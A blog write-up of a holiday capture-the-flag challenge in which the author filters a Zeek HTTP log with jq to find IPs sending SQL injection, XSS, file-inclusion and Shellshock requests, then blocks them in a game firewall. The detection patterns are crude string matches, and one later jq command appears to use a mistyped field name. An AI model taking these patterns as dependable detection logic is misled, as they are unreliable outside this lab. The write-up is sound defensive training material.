That’s got to be the one - thanks! Hey, you know what? We’ve got a crisis here. You see, Santa’s flight route is planned by a complex set of machine learning algorithms which use available weather data. All the weather stations are reporting severe weather to Santa’s Sleigh. I think someone might be forging intentionally false weather data! I’m so flummoxed I can’t even remember how to login! Hmm… Maybe the Zeek http.log could help us. I worry about LFI, XSS, and SQLi in the Zeek log - oh my! And I’d be shocked if there weren’t some shell stuff in there too. I’ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall. If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs. The sleigh’s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route. Try not to block many legitimate weather station IPs as that could also cause route calculation failure. Remember, when looking at JSON data, jq is the tool for you!

Objective 12 - Filter Out Poisoned Sources of Weather Data

Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. Block the 100 offending sources of information to guide Santa’s sleigh through the attack. Submit the Route ID (“RID”) success value that you’re given. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.

Initial Dialog - The Tooth Fairy

I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season. I hate how Santa is so beloved, but only works one day per year! He has all of the resources of the North Pole and the elves to help him too. I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children. But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us! But, although you found me, you haven’t foiled my plot! Santa’s sleigh will NOT be able to find its way. I will get my revenge and respect! I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!

alt text

Additional Dialog - Krampus Hollyfeld

But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!

Technical

Looking at the website we see we need to login.
alt text
After a bit I look at the PDF we just decrypted and there was a hint
alt text
Viewing the readme gives the credentials and we’re in
alt text
Poking around we see where we need to enter the bad IPs to block
alt text
We apply the same jq command we learned in the console challenge, but need to find offending IPs that arre attacking via SQLi, XSS, LFI and some Shell Shock
This part is pretty straight forward and we build out a script to find these types of attacks based on various field

#!/bin/bash
#SQLi
cat http.log | jq -r '.[] | select (.username | contains("'"'"'")) | .["id.orig_h"]' > bad_srf_ips
cat http.log | jq -r '.[] | select (.uri | contains("'"'"'")) | .["id.orig_h"]' >> bad_srf_ips
cat http.log | jq -r '.[] | select (.user_agent | contains("'"'"'")) | .["id.orig_h"]' >> bad_srf_ips
#XSS
cat http.log | jq -r '.[] | select (.uri | contains("<script>")) | .["id.orig_h"]' >> bad_srf_ips
cat http.log | jq -r '.[] | select (.host | contains("<script>")) | .["id.orig_h"]'>> bad_srf_ips
#LFI
cat http.log | jq -r '.[] | select (.uri | contains("pass")) | .["id.orig_h"]' >> bad_srf_ips
#SS
cat http.log | jq -r '.[] | select (.user_agent | contains(":;")) | .["id.orig_h"]' >> bad_srf_ips

sort -u bad_srf_ips  > bad_ips

Running this script against the http.log and then doing a line count, we find 75 bad IPs. Unfortunately this isn’t enough (knew it could be that easy)

After looking around we find that some of the offending IPs used legitimate UserAgents. We’ll need to do a search to find any requests from the bad IPs and capture the list of user_agents. We tack on the following to our script

jq -r '.[] | select(.["id.orig_h"] == "0.216.249.31" or .["id.orig_h"] == "10.155.246.29" or .["id.orig_h"] == "102.143.16.184" or .["id.orig_h"] == "106.132.195.153" or .["id.orig_h"] == "106.93.213.219" or .["id.orig_h"] == "111.81.145.191" or .["id.orig_h"] == "116.116.98.205" or .["id.orig_h"] == "118.196.230.170" or .["id.orig_h"] == "1.185.21.112" or .["id.orig_h"] == "121.7.186.163" or .["id.orig_h"] == "123.127.233.97" or .["id.orig_h"] == "129.121.121.48" or .["id.orig_h"] == "131.186.145.73" or .["id.orig_h"] == "132.45.187.177" or .["id.orig_h"] == "13.39.153.254" or .["id.orig_h"] == "135.203.243.43" or .["id.orig_h"] == "135.32.99.116" or .["id.orig_h"] == "150.45.133.97" or .["id.orig_h"] == "150.50.77.238" or .["id.orig_h"] == "168.66.108.62" or .["id.orig_h"] == "169.242.54.5" or .["id.orig_h"] == "173.37.160.150" or .["id.orig_h"] == "180.57.20.247" or .["id.orig_h"] == "186.28.46.179" or .["id.orig_h"] == "187.178.169.123" or .["id.orig_h"] == "190.245.228.38" or .["id.orig_h"] == "19.235.69.221" or .["id.orig_h"] == "193.228.194.36" or .["id.orig_h"] == "194.143.151.224" or .["id.orig_h"] == "200.75.228.240" or .["id.orig_h"] == "211.229.3.254" or .["id.orig_h"] == "220.132.33.81" or .["id.orig_h"] == "2.230.60.70" or .["id.orig_h"] == "223.149.180.133" or .["id.orig_h"] == "2.240.116.254" or .["id.orig_h"] == "225.191.220.138" or .["id.orig_h"] == "227.110.45.126" or .["id.orig_h"] == "229.133.163.235" or .["id.orig_h"] == "229.229.189.246" or .["id.orig_h"] == "230.246.50.221" or .["id.orig_h"] == "233.74.78.199" or .["id.orig_h"] == "23.49.177.78" or .["id.orig_h"] == "238.143.78.114" or .["id.orig_h"] == "249.34.9.16" or .["id.orig_h"] == "250.51.219.47" or .["id.orig_h"] == "253.182.102.55" or .["id.orig_h"] == "254.140.181.172" or .["id.orig_h"] == "25.80.197.172" or .["id.orig_h"] == "27.88.56.114" or .["id.orig_h"] == "28.169.41.122" or .["id.orig_h"] == "31.254.228.4" or .["id.orig_h"] == "33.132.98.193" or .["id.orig_h"] == "34.129.179.28" or .["id.orig_h"] == "42.103.246.250" or .["id.orig_h"] == "42.191.112.181" or .["id.orig_h"] == "44.74.106.131" or .["id.orig_h"] == "45.239.232.245" or .["id.orig_h"] == "48.66.193.176" or .["id.orig_h"] == "49.161.8.58" or .["id.orig_h"] == "52.39.201.107" or .["id.orig_h"] == "56.5.47.137" or .["id.orig_h"] == "61.110.82.125" or .["id.orig_h"] == "65.153.114.120" or .["id.orig_h"] == "68.115.251.76" or .["id.orig_h"] == "69.221.145.150" or .["id.orig_h"] == "75.215.214.65" or .["id.orig_h"] == "75.73.228.192" or .["id.orig_h"] == "79.198.89.109" or .["id.orig_h"] == "80.244.147.207" or .["id.orig_h"] == "81.14.204.154" or .["id.orig_h"] == "83.0.8.119" or .["id.orig_h"] == "84.147.231.129" or .["id.orig_h"] == "84.185.44.166" or .["id.orig_h"] == "9.206.212.33" or .["id.orig_h"] == "95.166.116.45" ) | .user_agent' http.log > bad_user_agent

Now my hope was to automate this through a script, but I just wanted to get done. Didn’t happen

We get the requests and need to:
1. put a double slash in front of all the single slashes in the malicious queries
2. add quotes around each user-agent
3. run a while loop on the http.log checking against the list of bad user-agents

while read ua; do cat http.log | jq '.[] | select (."user_agent" == '"$ua"')'; done < updated_bad_user_agent > pre_final

4. then we need to output the IPs from that output to a new file

cat pre_final | jq '. | .["id_orig_h"]' > final_ips

5. then we need to remove the double quotes

cat final_ips | tr -d '"' > final_final_ips

6. running the line count we get 93 IPs

Adding these IPs as Deny, the route recalculates and it’s successful!
alt text

Entering this RID number in completes the final objective
alt text

Ending

Location: Bell Tower

Dialog - Tooth Fairy

You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren’t for you meddling kids!

Dialog - Krampus

Congratulations on a job well done! Oh, by the way, I won the Frido Sleigh contest. I got 31.8% of the prizes, though I’ll have to figure that out.

Dialog - Santa

You did it! Thank you! You uncovered the sinister plot to destroy the holiday season! Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays! Ho Ho Ho! The more I laugh, the more I fill with glee. And the more the glee, The more I’m a merrier me! Merry Christmas and Happy Holidays.

alt text

there is actually a letter in the upper left-hand corner as well

alt text

Written on January 3, 2020
Share on: